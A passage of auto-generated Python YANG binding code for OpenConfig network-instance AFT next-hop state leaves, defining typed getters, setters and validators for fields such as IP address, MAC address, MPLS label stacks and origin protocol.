except (TypeError, ValueError):
raise ValueError(
{
"error-string": """weight must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""",
}
)
self.__weight = t
if hasattr(self, "_set"):
self._set()
def _unset_weight(self):
self.__weight = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
def _get_ip_address(self):
"""
Getter method for ip_address, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/ip_address (inet:ip-address-no-zone)
YANG Description: The IP address of the next-hop system.
"""
return self.__ip_address
def _set_ip_address(self, v, load=False):
"""
Setter method for ip_address, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/ip_address (inet:ip-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_ip_address is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ip_address() directly.
YANG Description: The IP address of the next-hop system.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9a-fA-F:\\.]*"},
),
],
is_leaf=True,
yang_name="ip-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address-no-zone",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """ip_address must be of a type compatible with inet:ip-address-no-zone""",
"defined-type": "inet:ip-address-no-zone",
"generated-type": """YANGDynClass(base=[RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}),RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}),], is_leaf=True, yang_name="ip-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ip-address-no-zone', is_config=False)""",
}
)
self.__ip_address = t
if hasattr(self, "_set"):
self._set()
def _unset_ip_address(self):
self.__ip_address = YANGDynClass(
base=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9a-fA-F:\\.]*"},
),
],
is_leaf=True,
yang_name="ip-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address-no-zone",
is_config=False,
)
def _get_mac_address(self):
"""
Getter method for mac_address, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/mac_address (yang:mac-address)
YANG Description: The MAC address of the next-hop if resolved by the local
network instance.
"""
return self.__mac_address
def _set_mac_address(self, v, load=False):
"""
Setter method for mac_address, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/mac_address (yang:mac-address)
If this variable is read-only (config: false) in the
source YANG file, then _set_mac_address is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mac_address() directly.
YANG Description: The MAC address of the next-hop if resolved by the local
network instance.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={"pattern": "[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}"},
),
is_leaf=True,
yang_name="mac-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:mac-address",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """mac_address must be of a type compatible with yang:mac-address""",
"defined-type": "yang:mac-address",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'}), is_leaf=True, yang_name="mac-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:mac-address', is_config=False)""",
}
)
self.__mac_address = t
if hasattr(self, "_set"):
self._set()
def _unset_mac_address(self):
self.__mac_address = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_dict={"pattern": "[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}"},
),
is_leaf=True,
yang_name="mac-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:mac-address",
is_config=False,
)
def _get_popped_mpls_label_stack(self):
"""
Getter method for popped_mpls_label_stack, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/popped_mpls_label_stack (oc-mplst:mpls-label)
YANG Description: The MPLS label stack to be popped from the packet when
switched by the system. The stack is encoding as a leaf-list
whereby the other of the entries is such that the first entry
is the label lowest down the label stack to be popped.
If the local system pops the outer-most label 400, then the
value of this list is [400,]. If the local system removes two
labels, the outer-most being 500, and the second of which is
500, then the value of the list is [500, 400].
A swap operation is reflected by entries in the
popped-mpls-label-stack and pushed-mpls-label-stack nodes.
"""
return self.__popped_mpls_label_stack
def _set_popped_mpls_label_stack(self, v, load=False):
"""
Setter method for popped_mpls_label_stack, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/popped_mpls_label_stack (oc-mplst:mpls-label)
If this variable is read-only (config: false) in the
source YANG file, then _set_popped_mpls_label_stack is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_popped_mpls_label_stack() directly.
YANG Description: The MPLS label stack to be popped from the packet when
switched by the system. The stack is encoding as a leaf-list
whereby the other of the entries is such that the first entry
is the label lowest down the label stack to be popped.
If the local system pops the outer-most label 400, then the
value of this list is [400,]. If the local system removes two
labels, the outer-most being 500, and the second of which is
500, then the value of the list is [500, 400].
A swap operation is reflected by entries in the
popped-mpls-label-stack and pushed-mpls-label-stack nodes.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=TypedListType(
allowed_type=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
restriction_dict={"range": ["16..1048575"]},
),
RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4_EXPLICIT_NULL": {"value": 0},
"ROUTER_ALERT": {"value": 1},
"IPV6_EXPLICIT_NULL": {"value": 2},
"IMPLICIT_NULL": {"value": 3},
"ENTROPY_LABEL_INDICATOR": {"value": 7},
"NO_LABEL": {},
},
),
]
),
is_leaf=False,
yang_name="popped-mpls-label-stack",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-mplst:mpls-label",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """popped_mpls_label_stack must be of a type compatible with oc-mplst:mpls-label""",
"defined-type": "oc-mplst:mpls-label",
"generated-type": """YANGDynClass(base=TypedListType(allowed_type=[RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': ['16..1048575']}),RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'IPV4_EXPLICIT_NULL': {'value': 0}, 'ROUTER_ALERT': {'value': 1}, 'IPV6_EXPLICIT_NULL': {'value': 2}, 'IMPLICIT_NULL': {'value': 3}, 'ENTROPY_LABEL_INDICATOR': {'value': 7}, 'NO_LABEL': {}},),]), is_leaf=False, yang_name="popped-mpls-label-stack", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-mplst:mpls-label', is_config=False)""",
}
)
self.__popped_mpls_label_stack = t
if hasattr(self, "_set"):
self._set()
def _unset_popped_mpls_label_stack(self):
self.__popped_mpls_label_stack = YANGDynClass(
base=TypedListType(
allowed_type=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
restriction_dict={"range": ["16..1048575"]},
),
RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4_EXPLICIT_NULL": {"value": 0},
"ROUTER_ALERT": {"value": 1},
"IPV6_EXPLICIT_NULL": {"value": 2},
"IMPLICIT_NULL": {"value": 3},
"ENTROPY_LABEL_INDICATOR": {"value": 7},
"NO_LABEL": {},
},
),
]
),
is_leaf=False,
yang_name="popped-mpls-label-stack",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-mplst:mpls-label",
is_config=False,
)
def _get_pushed_mpls_label_stack(self):
"""
Getter method for pushed_mpls_label_stack, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/pushed_mpls_label_stack (oc-mplst:mpls-label)
YANG Description: The MPLS label stack imposed when forwarding packets to the
next-hop
- the stack is encoded as a leaf list whereby the order of the
entries is such that the first entry in the list is the
label at the bottom of the stack to be pushed.
To this end, a packet which is to forwarded to a device using
a service label of 42, and a transport label of 8072 will be
represented with a label stack list of [42, 8072].
The MPLS label stack list is ordered by the user, such that no
system re-ordering of leaves is permitted by the system.
A swap operation is reflected by entries in the
popped-mpls-label-stack and pushed-mpls-label-stack nodes.
"""
return self.__pushed_mpls_label_stack
def _set_pushed_mpls_label_stack(self, v, load=False):
"""
Setter method for pushed_mpls_label_stack, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/pushed_mpls_label_stack (oc-mplst:mpls-label)
If this variable is read-only (config: false) in the
source YANG file, then _set_pushed_mpls_label_stack is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_pushed_mpls_label_stack() directly.
YANG Description: The MPLS label stack imposed when forwarding packets to the
next-hop
- the stack is encoded as a leaf list whereby the order of the
entries is such that the first entry in the list is the
label at the bottom of the stack to be pushed.
To this end, a packet which is to forwarded to a device using
a service label of 42, and a transport label of 8072 will be
represented with a label stack list of [42, 8072].
The MPLS label stack list is ordered by the user, such that no
system re-ordering of leaves is permitted by the system.
A swap operation is reflected by entries in the
popped-mpls-label-stack and pushed-mpls-label-stack nodes.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=TypedListType(
allowed_type=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
restriction_dict={"range": ["16..1048575"]},
),
RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4_EXPLICIT_NULL": {"value": 0},
"ROUTER_ALERT": {"value": 1},
"IPV6_EXPLICIT_NULL": {"value": 2},
"IMPLICIT_NULL": {"value": 3},
"ENTROPY_LABEL_INDICATOR": {"value": 7},
"NO_LABEL": {},
},
),
]
),
is_leaf=False,
yang_name="pushed-mpls-label-stack",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-mplst:mpls-label",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """pushed_mpls_label_stack must be of a type compatible with oc-mplst:mpls-label""",
"defined-type": "oc-mplst:mpls-label",
"generated-type": """YANGDynClass(base=TypedListType(allowed_type=[RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': ['16..1048575']}),RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'IPV4_EXPLICIT_NULL': {'value': 0}, 'ROUTER_ALERT': {'value': 1}, 'IPV6_EXPLICIT_NULL': {'value': 2}, 'IMPLICIT_NULL': {'value': 3}, 'ENTROPY_LABEL_INDICATOR': {'value': 7}, 'NO_LABEL': {}},),]), is_leaf=False, yang_name="pushed-mpls-label-stack", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-mplst:mpls-label', is_config=False)""",
}
)
self.__pushed_mpls_label_stack = t
if hasattr(self, "_set"):
self._set()
def _unset_pushed_mpls_label_stack(self):
self.__pushed_mpls_label_stack = YANGDynClass(
base=TypedListType(
allowed_type=[
RestrictedClassType(
base_type=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
restriction_dict={"range": ["16..1048575"]},
),
RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"IPV4_EXPLICIT_NULL": {"value": 0},
"ROUTER_ALERT": {"value": 1},
"IPV6_EXPLICIT_NULL": {"value": 2},
"IMPLICIT_NULL": {"value": 3},
"ENTROPY_LABEL_INDICATOR": {"value": 7},
"NO_LABEL": {},
},
),
]
),
is_leaf=False,
yang_name="pushed-mpls-label-stack",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-mplst:mpls-label",
is_config=False,
)
def _get_decapsulate_header(self):
"""
Getter method for decapsulate_header, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/decapsulate_header (oc-aftt:encapsulation-header-type)
YANG Description: When forwarding a packet to the specified next-hop, the local
system performs a decapsulation of the packet - removing the
specified header type. In the case that no next-hop is
specified, the packet header is removed, and a subsequent
forwarding lookup is performed on the packet encapsulated
within the header, matched within the relevant AFT within the
specified network-instance.
"""
return self.__decapsulate_header
def _set_decapsulate_header(self, v, load=False):
"""
Setter method for decapsulate_header, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/decapsulate_header (oc-aftt:encapsulation-header-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_decapsulate_header is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_decapsulate_header() directly.
YANG Description: When forwarding a packet to the specified next-hop, the local
system performs a decapsulation of the packet - removing the
specified header type. In the case that no next-hop is
specified, the packet header is removed, and a subsequent
forwarding lookup is performed on the packet encapsulated
within the header, matched within the relevant AFT within the
specified network-instance.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
),
is_leaf=True,
yang_name="decapsulate-header",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-aftt:encapsulation-header-type",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """decapsulate_header must be of a type compatible with oc-aftt:encapsulation-header-type""",
"defined-type": "oc-aftt:encapsulation-header-type",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'GRE': {}, 'IPV4': {}, 'IPV6': {}, 'MPLS': {}},), is_leaf=True, yang_name="decapsulate-header", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-aftt:encapsulation-header-type', is_config=False)""",
}
)
self.__decapsulate_header = t
if hasattr(self, "_set"):
self._set()
def _unset_decapsulate_header(self):
self.__decapsulate_header = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
),
is_leaf=True,
yang_name="decapsulate-header",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-aftt:encapsulation-header-type",
is_config=False,
)
def _get_encapsulate_header(self):
"""
Getter method for encapsulate_header, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/encapsulate_header (oc-aftt:encapsulation-header-type)
YANG Description: When forwarding a packet to the specified next-hop the local
system performs an encapsulation of the packet - adding the
specified header type.
"""
return self.__encapsulate_header
def _set_encapsulate_header(self, v, load=False):
"""
Setter method for encapsulate_header, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/encapsulate_header (oc-aftt:encapsulation-header-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_encapsulate_header is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_encapsulate_header() directly.
YANG Description: When forwarding a packet to the specified next-hop the local
system performs an encapsulation of the packet - adding the
specified header type.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
),
is_leaf=True,
yang_name="encapsulate-header",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-aftt:encapsulation-header-type",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """encapsulate_header must be of a type compatible with oc-aftt:encapsulation-header-type""",
"defined-type": "oc-aftt:encapsulation-header-type",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'GRE': {}, 'IPV4': {}, 'IPV6': {}, 'MPLS': {}},), is_leaf=True, yang_name="encapsulate-header", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-aftt:encapsulation-header-type', is_config=False)""",
}
)
self.__encapsulate_header = t
if hasattr(self, "_set"):
self._set()
def _unset_encapsulate_header(self):
self.__encapsulate_header = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
),
is_leaf=True,
yang_name="encapsulate-header",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-aftt:encapsulation-header-type",
is_config=False,
)
def _get_origin_protocol(self):
"""
Getter method for origin_protocol, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/origin_protocol (identityref)
YANG Description: The protocol from which the AFT entry was learned.
"""
return self.__origin_protocol
def _set_origin_protocol(self, v, load=False):
"""
Setter method for origin_protocol, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/origin_protocol (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_origin_protocol is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_origin_protocol() directly.
YANG Description: The protocol from which the AFT entry was learned.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:DIRECTLY_CONNECTED": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:LOCAL_AGGREGATE": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
},
),
is_leaf=True,
yang_name="origin-protocol",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """origin_protocol must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'BGP': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:BGP': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:BGP': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'ISIS': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:ISIS': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:ISIS': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'OSPF': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:OSPF': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:OSPF': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'OSPF3': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:OSPF3': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:OSPF3': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'STATIC': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:STATIC': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:STATIC': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'DIRECTLY_CONNECTED': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:DIRECTLY_CONNECTED': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:DIRECTLY_CONNECTED': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'LOCAL_AGGREGATE': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:LOCAL_AGGREGATE': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:LOCAL_AGGREGATE': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}},), is_leaf=True, yang_name="origin-protocol", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=False)""",
}
)
self.__origin_protocol = t
if hasattr(self, "_set"):
self._set()
def _unset_origin_protocol(self):
self.__origin_protocol = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:BGP": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:ISIS": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:OSPF": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:OSPF3": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pol-types:STATIC": {
"@module": "openconfig-policy-types",
"@namespace": "http://openconfig.net/yang/policy-types",
},
"oc-pt:STATIC": {
"@module": "openconfig-policy-types",
